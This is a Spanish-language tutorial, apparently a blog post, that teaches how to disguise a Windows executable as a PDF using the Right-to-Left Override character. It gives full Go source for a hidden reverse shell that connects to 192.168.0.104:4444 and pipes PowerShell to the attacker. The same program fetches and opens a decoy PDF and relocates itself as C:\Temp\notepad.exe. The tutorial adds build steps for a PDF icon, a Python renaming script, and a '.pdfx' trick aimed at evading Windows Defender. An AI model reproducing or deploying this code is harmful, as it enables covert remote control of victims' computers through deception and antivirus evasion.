Abusando de RTLO - Defender bypass - Golang revershell

¿Qué es RTLO?

TLO, o Right-to-Left Override, es una técnica utilizada en informática para alterar la dirección del texto. En condiciones normales, el texto se lee de izquierda a derecha, como en inglés o español. Sin embargo, con el RTLO, se puede cambiar la dirección del texto de derecha a izquierda.

¿Como lo utilizan los hackers?

1. Camuflar archivos maliciosos: Cambian la dirección del texto en nombres de archivos para hacer que parezcan seguros cuando en realidad son peligrosos.

2. Phishing: Ocultan enlaces maliciosos en correos electrónicos o redes sociales, engañando a los usuarios para que crean que están interactuando con sitios web legítimos.

3. Evadir filtros de seguridad: Alteran la dirección del texto en el código malicioso para eludir la detección de sistemas de seguridad.

En resumen, RTLO es una herramienta que los hackers usan para engañar y ocultar su actividad maliciosa.

Demostracion de RTLO

El caracter unicode que se utiliza para el RTLO es '\u202e' este caracter unicode lo que hace es dar la vuelta a los caracteres que hay detras de el. Ejemplo:

Cadena original: holaquetal
Caracter del RTLO: \u202e
Cadena con RTLO sin interpretar: holaque\u202etal
Salida: holaquelat

Como podemos ver en el ejemplo todo lo que se pone detras de el caracter RTLO se ha cambiado de derecha a izquierda el 'tal' se ha convertido en 'lat'.

La gracia de esta tecnica es poder utilizarla para cambiar las extensiones de los archivos para que parezcan otras.

Ejemplo:

Cadena original: virusfdp.exe
Caracter del RTLO: \u202e
Cadena con RTLO sin interpretar: virus\u202efdp.exe
Salida: virusexe.pdf

Como podemos ver en este ejemplo podemos hacer que un archivo .exe parezca un .pdf sin serlo, ya que cuando se ejecuta seguira siendo un .exe

Revershell Golang - Defender Undetection - Fake pdf

He programado en el lenguaje Golang una revershell la cual el defender no detecta. Tambien para que sea menos sospechoso ya que el .exe estara camuflado como un .pdf vamos a hacer que la revershell tambien descargue un pdf y luego lo abra para quitar cualquier tipo de sospecha, tambien haremos que el binario de go se renombre como totepad.exe en la carpeta "C:\Temp\" dejando el pdf normal en la carpeta donde se estaba ejecutando el binario malicioso y dejando un notepad.exe

Codigo Golang:

package main

import (
	"io"
	"net"
	"net/http"
	"os"
	"os/exec"
	"syscall"
)

func downloadFile(url, filepath string) error {
	response, err := http.Get(url)
	if err != nil {
		return err
	}
	defer response.Body.Close()

	file, err := os.Create(filepath)
	if err != nil {
		return err
	}
	defer file.Close()

	_, err = io.Copy(file, response.Body)
	return err
}

func main() {
	downloadFile("http://192.168.0.104/pdf.pdf", "Documento_de_anexe.pdf")
	os.Rename(os.Args[0], "notepad.exe")
	dest := "C:\\Temp\\notepad.exe"
	os.Rename("notepad.exe", dest)
	cpdf := exec.Command("cmd", "/c", "start", "Documento_de_anexe.pdf")
	cpdf.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	cpdf.Run()
	conn, err := net.Dial("tcp", "192.168.0.104:4444")
	if err != nil {
		os.Exit(1)
	}
	c := exec.Command("powershell.exe")
	c.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	c.Stdin = conn
	c.Stdout = conn
	c.Stderr = conn
	c.Run()
}

Para hacerlo mas creible vamos a compilar el .exe con el icono del pdf, para hacer esto seguimos los siguientes pasos:

1. Descargamos el .ico que queramos utilizar: https://www.deviantart.com/ezzydeath/art/ICO-MicrosoftEdgePDF-Windows-10-761274829
2. Nos vamos a la carpeta donde se encuantra la revershell en .go y ejecutamos los siguientes comandos:

   go mod init revershell # Creamos el archivo go.mod
   go install github.com/akavel/rsrc@latest # Instalamos rsrc
   rsrc -ico pdf.ico -o icon.syso # Convertimos el icono del pdf a .syso
   go build -o revershell.exe -ldflags -H=windowsgui # Compilamos la reverhsell con el icono del pdf

Usando RTLO - Defender Bypass

Para poner el caracter de RTLO vamos a utilizar un script en python que encontre en linkedin de un conocido. Post

Script python:

import sys
import shutil

file = sys.argv[1]

newname = (file.split('.')[0] + u'\u202e' + ".pdf"[::-1]  + file.split('.')[1]).encode('utf-8')
    
print("Fichero " + str(newname))
shutil.copy(file, newname)

Si lo utilizamos con la revershell podemos ver que funciona:

python3 .\exe_to_pdf.py revershell.exe

El problema de esto es que esta tecnica es detectada por el defender.

Para que el defender no detecte la tecnica del RTLO usaremos una extension parecida al pdf como pdfx, cambiamos en el codigo a esa otra extension.

Script python .pdfx:

import sys
import shutil

file = sys.argv[1]

newname = (file.split('.')[0] + u'\u202e' + ".pdfx"[::-1]  + file.split('.')[1]).encode('utf-8')
    
print("Fichero " + str(newname))
shutil.copy(file, newname)

Ahora ejecutamos otra vez el script y veremos que el defender no lo detecta, tambien usaremos una palabra del español que acabe en exe para que no sea tan cantoso.

Renombramos la revershell con algo creible que pueda llevar la palabra exe al final:

Ya tenemos un .exe que parece pdf.

Compartir pdf - recibir revershell - Defender undetection

Primero vamos a conseguir el pdf que queremos que se abra cuando se ejecute la revershell lo renombraremos a pdf.pdf y lo compartiremos por http con python, claramente tu servidor tiene que tener la ip que pusimos anteriormente para abrir el pdf en la revershell en go.

Iniciamos el servidor http:

Y ya podemos abrir el archivo en la maquina windows victima y recibiremos la revershell, tambien podremos ver como desaparece el .exe enmascarado y se queda un pdf normal mientras en la carpeta C:\Temp se ha creado un notepad.exe donde esta corriendo la revershell.

Video POC:

4MB

2024-05-13 17-13-38.mp4